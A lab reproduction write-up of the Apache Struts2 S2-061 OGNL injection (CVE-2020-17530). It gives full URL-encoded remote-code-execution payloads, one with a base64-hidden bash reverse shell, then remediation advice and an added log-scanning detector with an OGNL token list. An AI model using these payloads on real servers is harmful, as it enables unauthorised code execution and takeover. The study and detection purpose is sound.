Struts2 S2-061_CVE-2020-17530

Vulnerability overview

Apache Struts2 is a web framework for developing Java EE web applications. On 8 December 2020 Apache Struts disclosed the S2-061 remote code execution vulnerability (CVE-2020-17530): when certain tags are used, an OGNL expression injection may be possible, leading to remote code execution. The risk is very high.

Affected versions

  • Apache Struts 2.0.0 – 2.5.25

Reproduction

Set up the vulhub s2-061 environment.

Here the parameter id is already given as a hint; in a real environment the parameter name would have to be brute-forced.

Executing a command

payload:http://172.31.84.221:8080/?id=%25{(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application[%27org.apache.tomcat.InstanceManager%27]).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr[%27struts.valueStack%27]).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d{%27id%27}).(%23res%3d%23exec.exec(%23cmd))}

Reverse shell

Generate a reverse shell and start the listener.

Modify the command; after it executes the browser shows a noticeable delay, then check the listener for the received shell.

Tool-based detection

Project address

PoC check: if no error is reported, the vulnerability is present.

Exp: fill in the IP and port to generate the payload; start the listener and run it to get a shell.

172.31.84.221:8080/?id=%25%7B%0A(%23request.map%3D%23application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0%2C0)%20%2B%20%0A(%23request.map.setBean(%23request.get('struts.valueStack'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%20%0A(%23request.map2%3D%23application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0%2C0)%20%2B%0A(%23request.map2.setBean(%23request.get('map').get('context'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%20%0A(%23request.map3%3D%23application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0%2C0)%20%2B%20%0A(%23request.map3.setBean(%23request.get('map2').get('memberAccess'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%20%0A(%23request.get('map3').put('excludedPackageNames'%2C%23application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%20%0A(%23request.get('map3').put('excludedClasses'%2C%23application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%0A(%23application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec(%7B%27bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xNzIuMzEuODQuMjIxLzY1NTM1IDA%2BJjE%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27%7D))%0A%7D

Vulnerability principle

Original analysis address. I'm too much of a noob; this isn't something I can understand at my current level....

Remediation

Upgrade the Apache Struts framework to the latest version.
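For defenders who want to find attempts like the requests shown above in their web server logs while the upgrade is being rolled out, here is an added example (it is not from the original post, vulhub, or the Struts project). It repeatedly URL-decodes each request target, because the payloads on this page are double-encoded (%25{ becomes %{), and then looks for the OGNL expression delimiter together with the sandbox-related names those payloads touch (#application, InstanceManager, memberAccess, excludedClasses, excludedPackageNames, freemarker's Execute). The log lines are constructed sample data, not real traffic; the threshold of two indicators per request is an assumption you should tune for your own environment.

```python
import re
from urllib.parse import unquote

# OGNL expression delimiters (%{...} or ${...}) after full decoding.
OGNL_EXPR = re.compile(r"[%$]\{")

# Names that appear in the S2-061 payloads above: the objects a payload
# reaches in order to clear the OGNL sandbox exclusion lists and run code.
SANDBOX_TOKENS = (
    "#application",
    "org.apache.tomcat.InstanceManager",
    "memberAccess",
    "excludedClasses",
    "excludedPackageNames",
    "freemarker.template.utility.Execute",
)

# Combined log format, e.g. Apache/Nginx "common" or "combined" access logs.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)


def full_decode(s, max_rounds=5):
    """URL-decode until the string stops changing (handles double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            return s
        s = decoded
    return s


def score_request(target, min_hits=2):
    """Return (is_suspicious, matched_tokens) for one request target (path + query).

    A request is flagged only if it carries an OGNL expression delimiter AND
    at least min_hits of the sandbox-related names (assumed threshold).
    """
    decoded = full_decode(target)
    if not OGNL_EXPR.search(decoded):
        return False, []
    hits = [tok for tok in SANDBOX_TOKENS if tok in decoded]
    return len(hits) >= min_hits, hits


def scan_log(text):
    """Scan access-log text; return a list of (ip, timestamp, matched_tokens)."""
    alerts = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        suspicious, hits = score_request(m["target"])
        if suspicious:
            alerts.append((m["ip"], m["ts"], hits))
    return alerts


# Constructed sample log (not real traffic). The second line is a shortened
# fragment modelled on the double-encoded payload shown earlier on this page;
# the third shows that a lone ${...} template reference is not enough to alert.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Dec/2020:10:00:01 +0000] "GET /?id=42 HTTP/1.1" 200 512
10.0.0.9 - - [08/Dec/2020:10:00:02 +0000] "GET /?id=%25{(%23x%3d%23application[%27org.apache.tomcat.InstanceManager%27]).(%23sm%3d%23x.get(%27memberAccess%27)).(%23x.put(%27excludedClasses%27%2c%23emptySet))} HTTP/1.1" 200 512
10.0.0.7 - - [08/Dec/2020:10:00:03 +0000] "GET /search?q=%24%7Bprice%7D HTTP/1.1" 200 100
"""

if __name__ == "__main__":
    for ip, ts, hits in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} possible S2-061 OGNL injection: {', '.join(hits)}")
```

Run it against a real access log by passing the file contents to scan_log(); a hit is a strong reason to check whether that host still runs an affected Struts version and to review what the request produced.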

Related links

https://cwiki.apache.org/confluence/display/WW/S2-061
